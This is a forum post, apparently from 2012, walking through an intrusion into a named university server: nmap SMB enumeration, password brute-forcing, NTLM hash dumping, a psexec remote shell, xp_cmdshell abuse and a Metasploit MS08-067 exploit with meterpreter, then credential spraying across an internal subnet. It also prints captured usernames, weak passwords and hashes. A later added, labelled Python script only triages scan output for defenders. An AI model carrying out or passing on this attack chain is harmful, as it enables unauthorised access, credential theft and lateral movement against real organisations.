nmap + msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // exploit the MS08-067 vulnerability against the target machine in msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try to log into the whole internal subnet using the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack.
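Added here as a defender-side aid, not part of the original post: a small Python triage script that parses the "Host script results" block of the nmap output format shown above (smb-brute, smb-enum-shares, smb-check-vulns) and turns blank or guessable logins, anonymous share access and a VULNERABLE verdict into ranked findings, so the same scripts run against one's own hosts yield an actionable list. The sample report and the severity rules are assumptions of this example.

```python
import re

# Constructed sample modelled on the script output format in the post (not real scan data).
SAMPLE_REPORT = """\
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""

HEADER = re.compile(r"^\|_?\s*([\w-]+):\s*$")  # "| smb-brute:" style script header
ENTRY = re.compile(r"^\|_?\s*(.*)$")           # any other "| ..." result line

def parse_host_scripts(report):
    """Map each NSE script name to its stripped result lines (one host's report)."""
    scripts, current, in_block = {}, None, False
    for line in report.splitlines():
        if line.startswith("Host script results:"):
            in_block = True
        elif in_block and (m := HEADER.match(line)):
            current = m.group(1)
            scripts[current] = []
        elif in_block and current and (m := ENTRY.match(line)):
            scripts[current].append(m.group(1).strip())
        elif in_block:
            in_block = False  # "Nmap done:" or the next host ends the block
    return scripts

def triage(report):
    """Turn smb-brute / smb-enum-shares / smb-check-vulns results into (severity, message)."""
    scripts, findings, share = parse_host_scripts(report), [], None
    for entry in scripts.get("smb-brute", []):
        if m := re.match(r"(\S+):(\S+) => Login was successful", entry):
            user, secret = m.groups()
            sev = "CRITICAL" if secret == "<blank>" or user.lower() == "administrator" else "HIGH"
            findings.append((sev, f"guessable SMB credential {user}:{secret}"))
    for entry in scripts.get("smb-enum-shares", []):
        if m := re.match(r"Anonymous access:\s*(\S+)", entry):
            if m.group(1) != "<none>":
                findings.append(("HIGH", f"share {share} permits anonymous {m.group(1)}"))
        else:
            share = entry  # a bare line names the share described by the lines after it
    for entry in scripts.get("smb-check-vulns", []):
        if m := re.match(r"([\w-]+):\s*VULNERABLE", entry):
            findings.append(("CRITICAL", f"unpatched {m.group(1)}"))
    return findings
```

Feed it the saved normal output (`nmap -oN`) of a scan of your own estate; any CRITICAL line is a host to remediate before anything else.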